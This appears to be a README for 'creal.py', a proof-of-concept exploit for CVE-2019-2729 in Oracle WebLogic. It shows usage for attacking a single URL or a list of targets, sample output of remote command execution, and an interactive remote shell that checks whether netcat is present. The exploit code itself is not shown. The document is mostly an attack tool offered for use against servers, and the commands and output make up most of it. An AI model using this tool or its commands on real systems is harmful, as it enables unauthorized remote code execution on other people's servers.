PoC for exploiting CVE-2019-2729 on WebLogic

Overview

CVE-2019-2729 - creal

Exploit Usage

python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect

Exploit single target:

$ python3 creal.py -u http://IP:PORT -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

Exploit URL list:

$ python3 creal.py -f list.txt -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

[-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
[!] There was an error connecting!

--------------------------
Vulnerable targets scanned:
[+] http://xxx.xxx.xxx.xxx:xxxx

Interactive shell:

$ python3 creal.py -s http://IP:PORT

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER

> id
uid=500(UID) gid=500(GID) groups=500(GROUP)

> whoami
USER

> which nc
/usr/bin/nc

Owner: Luciano Anezin